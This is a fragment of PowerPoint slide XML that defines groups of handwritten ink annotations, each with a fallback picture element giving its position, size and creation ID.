                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11C08223-FAC4-D0AA-1B91-A30EE84075A2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId105"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6833452" y="2417292"/>
                  <a:ext cx="2020680" cy="2277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7" name="Ink 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914BAEBF-8B66-0F61-2914-4E30CCD29EF0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7142692" y="4668732"/>
                <a:ext cx="1725480" cy="263880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="37" name="Ink 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{914BAEBF-8B66-0F61-2914-4E30CCD29EF0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId107"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7107052" y="4632732"/>
                  <a:ext cx="179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8" name="Ink 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA95BFFA-D4D4-32E6-3D49-332F196E155C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6986812" y="3227292"/>
                <a:ext cx="492120" cy="479160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="38" name="Ink 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA95BFFA-D4D4-32E6-3D49-332F196E155C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId109"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6950812" y="3191652"/>
                  <a:ext cx="56376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9" name="Ink 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBBF78A-1325-6463-95A5-7899048D8EB4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7627612" y="3399372"/>
                <a:ext cx="88920" cy="196200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="39" name="Ink 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EBBF78A-1325-6463-95A5-7899048D8EB4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId111"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7591972" y="3363732"/>
                  <a:ext cx="1605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0" name="Ink 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69751993-7D6F-B61C-113C-F3255E3D00E2}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7705372" y="3141252"/>
                <a:ext cx="43920" cy="113760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="40" name="Ink 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69751993-7D6F-B61C-113C-F3255E3D00E2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId113"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7669732" y="3105612"/>
                  <a:ext cx="1155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1" name="Ink 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97451ED2-528D-D572-3047-7AAE061A68A8}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7947652" y="3360492"/>
                <a:ext cx="180000" cy="230040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="41" name="Ink 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97451ED2-528D-D572-3047-7AAE061A68A8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId115"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7912012" y="3324492"/>
                  <a:ext cx="2516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2" name="Ink 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57053711-F637-77C5-4039-840DFC410940}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5071972" y="3297492"/>
                <a:ext cx="1087920" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="42" name="Ink 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57053711-F637-77C5-4039-840DFC410940}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId117"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5035972" y="3261852"/>
                  <a:ext cx="1159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 name="Ink 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2586D7D-1DBB-8FFE-1995-939BEF469136}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5685052" y="3123972"/>
                <a:ext cx="427680" cy="664920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="43" name="Ink 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2586D7D-1DBB-8FFE-1995-939BEF469136}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId119"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5649412" y="3088332"/>
                  <a:ext cx="49932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8" name="Ink 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE511E1-6A69-E8FC-5487-46BA724B8B10}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5278972" y="4266252"/>
                <a:ext cx="1083240" cy="47880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="48" name="Ink 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEE511E1-6A69-E8FC-5487-46BA724B8B10}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId121"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5242972" y="4230252"/>
                  <a:ext cx="11548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9" name="Ink 48">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1792DF-74A8-3BB4-3F8C-1F60E4DB59F3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4977292" y="4110732"/>
                <a:ext cx="329400" cy="596160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="49" name="Ink 48">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1792DF-74A8-3BB4-3F8C-1F60E4DB59F3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId123"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4941652" y="4074732"/>
                  <a:ext cx="40104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0" name="Ink 49">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DBF282-8A21-3690-664B-ABB8221BF934}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6814732" y="4946652"/>
                <a:ext cx="1088640" cy="118440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="50" name="Ink 49">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1DBF282-8A21-3690-664B-ABB8221BF934}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId125"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6778732" y="4910652"/>
                  <a:ext cx="11602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Ink 74">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FDC76B-29C7-FCF9-6694-036772A75D34}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7573972" y="992412"/>
                <a:ext cx="1171080" cy="737640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="75" name="Ink 74">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FDC76B-29C7-FCF9-6694-036772A75D34}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId127"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7538332" y="956412"/>
                  <a:ext cx="1242720" cy="809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5961019C-4521-76B6-0CD1-C2E03FA3DFB5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7455532" y="1328292"/>
                <a:ext cx="832680" cy="489600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="76" name="Ink 75">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5961019C-4521-76B6-0CD1-C2E03FA3DFB5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId129"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7419892" y="1292652"/>
                  <a:ext cx="9043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0D24F3CC-0877-6254-7F8C-838181ED5DD6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5195092" y="2366892"/>
                <a:ext cx="209880" cy="447840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="85" name="Ink 84">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D24F3CC-0877-6254-7F8C-838181ED5DD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId131"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5159452" y="2331252"/>
                  <a:ext cx="2815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6" name="Ink 85">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123391AC-591E-F180-D11E-B156A2AD41ED}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5556172" y="2517372"/>
                <a:ext cx="118080" cy="156600"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="86" name="Ink 85">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123391AC-591E-F180-D11E-B156A2AD41ED}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId133"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5520532" y="2481732"/>
                  <a:ext cx="1897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7" name="Ink 86">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCB385A-D5FA-28A5-6694-8F5842724D66}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5812132" y="2304972"/>
                <a:ext cx="284400" cy="432720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="87" name="Ink 86">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DCB385A-D5FA-28A5-6694-8F5842724D66}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId135"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5776132" y="2268972"/>
                  <a:ext cx="35604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8" name="Ink 87">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42200195-4006-2D89-E440-532902D8F7D0}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="6134692" y="2327292"/>
                <a:ext cx="149760" cy="175320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="88" name="Ink 87">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42200195-4006-2D89-E440-532902D8F7D0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId137"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6099052" y="2291652"/>
                  <a:ext cx="2214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B79C3791-93F4-BF40-796F-8C4837DC595C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4639252" y="1773612"/>
                <a:ext cx="2044080" cy="1198440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="90" name="Ink 89">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79C3791-93F4-BF40-796F-8C4837DC595C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId139"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4603612" y="1737612"/>
                  <a:ext cx="2115720" cy="1270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Ink 90">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F1B9A57-D1AE-C26C-C8ED-6F9D2BBDB638}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5415412" y="1258092"/>
                <a:ext cx="8640" cy="360720"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="91" name="Ink 90">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F1B9A57-D1AE-C26C-C8ED-6F9D2BBDB638}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId141"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5379412" y="1222092"/>
                  <a:ext cx="802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Ink 91">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCF9D1D-BA48-1903-4EE4-BC9907226327}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5259532" y="1520172"/>
                <a:ext cx="536760" cy="191880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="92" name="Ink 91">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCF9D1D-BA48-1903-4EE4-BC9907226327}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId143"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5223532" y="1484532"/>
                  <a:ext cx="608400" cy="263520"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3077727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3C789311-D44A-29AF-F6DF-62EEF339471A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9307012" y="1343772"/>
            <a:ext cx="690480" cy="685080"/>
            <a:chOff x="9307012" y="1343772"/>
            <a:chExt cx="690480" cy="685080"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId2">
              <p14:nvContentPartPr>
                <p14:cNvPr id="51" name="Ink 50">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB40C4C-A952-C448-8131-43B814FF9C00}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9307012" y="1343772"/>
                <a:ext cx="283680" cy="484920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="51" name="Ink 50">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB40C4C-A952-C448-8131-43B814FF9C00}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9271012" y="1308132"/>
                  <a:ext cx="35532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2" name="Ink 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE0A3AC-F1D5-68F8-1BEE-503CED9D3D6F}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9807772" y="1600812"/>
                <a:ext cx="189720" cy="428040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="52" name="Ink 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE0A3AC-F1D5-68F8-1BEE-503CED9D3D6F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9772132" y="1564812"/>
                  <a:ext cx="261360" cy="499680"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="Group 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37924C84-1C3D-F515-0B96-AE633C3DFE26}"/>
              </a:ext>
